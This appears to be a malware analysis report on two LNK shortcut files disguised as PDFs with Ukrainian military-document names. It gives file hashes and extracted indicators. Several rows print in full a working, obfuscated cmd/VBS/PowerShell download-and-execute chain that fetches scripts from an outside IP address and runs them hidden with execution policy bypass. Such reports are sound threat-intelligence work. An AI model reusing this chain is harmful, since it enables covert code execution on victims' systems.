|
Hash | Hash Value |
|---|---|
| MD5 | 87c1badcfd555bca1b5fe13ed212d1b2
|
| Sha1 | c9b580d9811f2df1c70edc25825319d2eb29d392
|
| Sha256 | 90984d6788417bc284b17c3b302c1b667acfbf881eee0afeea1141b30f7379e1
|
| Sha384 | 907b70c12f49eb28d87c67c4c24ecaba564788955ba9838c0523f6405d7b650e6221a867ba9d11b48a7cc8eb5835d07c
|
| Sha512 | fa40e257d5a119c76723e6c2923d9b3b827cd334f2b0c10580764d012537314bd051fc190b2a8c85dfc7de263515cd63f51499f1bebcdfc5ceb808a0f7683a9e
|
| SSDeep | 48:ABx3NGkTvdqTel+tk051WUyauR6qxXY67QqTel+tsd51WU4csoqJ/iWEB/iIc1f:ABxZTSel+t1nJuXV77el+tGnFtjoIAf
|
| TLSH | 95C2E28173F81304F5B6FE36DE39AB45483ABA90ED31C7AC5950CC1D2A66A00EA75F35
|
|
Name | Value |
|---|---|
| LNK: Command Execution | cmd.exe /v /c "set "x1=MSXM" && set "x2=L2.XML" && set "v=!x1!!x2!HTTP" && echo Set h=CreateObject("!v!"):h.open "GET","http://2.26.74.115/v1sl4g488/aspiringpayoff.ps1",False:h.setRequestHeader "User-Agent","UA WindowsPowerShell":h.send:Set b=CreateObject("ADO" ^& "DB.Str" ^& "eam"):b.Type=1:b.Open:b.Write h.responseBody:b.SaveToFile "%TEMP%\NIwSHc.ps1",2 > %TEMP%\Rje.vbs && cscript //b %TEMP%\Rje.vbs && powershell -NoP -W Hidden -ExecutionPolicy Bypass -File %TEMP%\NIwSHc.ps1 && del %TEMP%\Rje.vbs %TEMP%\NIwSHc.ps1" |
| URLs in VB Code - #1 | http://2.26.74.115/v1sl4g488/aspiringpayoff.ps1 |
| Deobfuscated PowerShell | Remove-Item "%TEMP%\Rje.vbs" "%TEMP%\NIwSHc.ps1 IconLocation: imageres.dll" |
| Deobfuscated PowerShell | Remove-Item "%TEMP%\Rje.vbs" "%TEMP%\NIwSHc.ps1" |
| LNK: Command Execution | cmd.exe /v /c "set "x1=MSXM" && set "x2=L2.XML" && set "v=!x1!!x2!HTTP" && echo Set h=CreateObject("!v!"):h.open "GET","http://2.26.74.115/v1sl4g488/heartwoodtension.ps1",False:h.setRequestHeader "User-Agent","UA WindowsPowerShell":h.send:Set b=CreateObject("ADO" ^& "DB.Str" ^& "eam"):b.Type=1:b.Open:b.Write h.responseBody:b.SaveToFile "%TEMP%\0Y3F.ps1",2 > %TEMP%\NDh.vbs && cscript //b %TEMP%\NDh.vbs && powershell -NoP -W Hidden -ExecutionPolicy Bypass -File %TEMP%\0Y3F.ps1 && del %TEMP%\NDh.vbs %TEMP%\0Y3F.ps1" |
| URLs in VB Code - #1 | http://2.26.74.115/v1sl4g488/heartwoodtension.ps1 |
| Deobfuscated PowerShell | Remove-Item "%TEMP%\NDh.vbs" "%TEMP%\0Y3F.ps1 IconLocation: imageres.dll" |
| Deobfuscated PowerShell | Remove-Item "%TEMP%\NDh.vbs" "%TEMP%\0Y3F.ps1" |
|
Name | Value | Location |
|---|---|---|
| LNK: Command Execution | cmd.exe /v /c "set "x1=MSXM" && set "x2=L2.XML" && set "v=!x1!!x2!HTTP" && echo Set h=CreateObject("!v!"):h.open "GET","http://2.26.74.115/v1sl4g488/aspiringpayoff.ps1",False:h.setRequestHeader "User-Agent","UA WindowsPowerShell":h.send:Set b=CreateObject("ADO" ^& "DB.Str" ^& "eam"):b.Type=1:b.Open:b.Write h.responseBody:b.SaveToFile "%TEMP%\NIwSHc.ps1",2 > %TEMP%\Rje.vbs && cscript //b %TEMP%\Rje.vbs && powershell -NoP -W Hidden -ExecutionPolicy Bypass -File %TEMP%\NIwSHc.ps1 && del %TEMP%\Rje.vbs %TEMP%\NIwSHc.ps1" Malicious |
87c1badcfd555bca1b5fe13ed212d1b2 > VYTIaH_Osobova_sprava_viiskovosluzhbovtsia.pdf.lnk |
| URLs in VB Code - #1 | http://2.26.74.115/v1sl4g488/aspiringpayoff.ps1 |
87c1badcfd555bca1b5fe13ed212d1b2 > VYTIaH_Osobova_sprava_viiskovosluzhbovtsia.pdf.lnk > [Lnk Summary] |
| Deobfuscated PowerShell | Remove-Item "%TEMP%\Rje.vbs" "%TEMP%\NIwSHc.ps1 IconLocation: imageres.dll" Malicious |
87c1badcfd555bca1b5fe13ed212d1b2 > VYTIaH_Osobova_sprava_viiskovosluzhbovtsia.pdf.lnk > [Lnk Summary] > [PowerShell Command] |
| Deobfuscated PowerShell | Remove-Item "%TEMP%\Rje.vbs" "%TEMP%\NIwSHc.ps1" Malicious |
87c1badcfd555bca1b5fe13ed212d1b2 > VYTIaH_Osobova_sprava_viiskovosluzhbovtsia.pdf.lnk > LNK CommandLine > [PowerShell Command] |
| LNK: Command Execution | cmd.exe /v /c "set "x1=MSXM" && set "x2=L2.XML" && set "v=!x1!!x2!HTTP" && echo Set h=CreateObject("!v!"):h.open "GET","http://2.26.74.115/v1sl4g488/heartwoodtension.ps1",False:h.setRequestHeader "User-Agent","UA WindowsPowerShell":h.send:Set b=CreateObject("ADO" ^& "DB.Str" ^& "eam"):b.Type=1:b.Open:b.Write h.responseBody:b.SaveToFile "%TEMP%\0Y3F.ps1",2 > %TEMP%\NDh.vbs && cscript //b %TEMP%\NDh.vbs && powershell -NoP -W Hidden -ExecutionPolicy Bypass -File %TEMP%\0Y3F.ps1 && del %TEMP%\NDh.vbs %TEMP%\0Y3F.ps1" Malicious |
87c1badcfd555bca1b5fe13ed212d1b2 > VYTIaH_Nakaz_pro_rozrakhunok_vysluhy.pdf.lnk |
| URLs in VB Code - #1 | http://2.26.74.115/v1sl4g488/heartwoodtension.ps1 |
87c1badcfd555bca1b5fe13ed212d1b2 > VYTIaH_Nakaz_pro_rozrakhunok_vysluhy.pdf.lnk > [Lnk Summary] |
| Deobfuscated PowerShell | Remove-Item "%TEMP%\NDh.vbs" "%TEMP%\0Y3F.ps1 IconLocation: imageres.dll" Malicious |
87c1badcfd555bca1b5fe13ed212d1b2 > VYTIaH_Nakaz_pro_rozrakhunok_vysluhy.pdf.lnk > [Lnk Summary] > [PowerShell Command] |
| Deobfuscated PowerShell | Remove-Item "%TEMP%\NDh.vbs" "%TEMP%\0Y3F.ps1" Malicious |
87c1badcfd555bca1b5fe13ed212d1b2 > VYTIaH_Nakaz_pro_rozrakhunok_vysluhy.pdf.lnk > LNK CommandLine > [PowerShell Command] |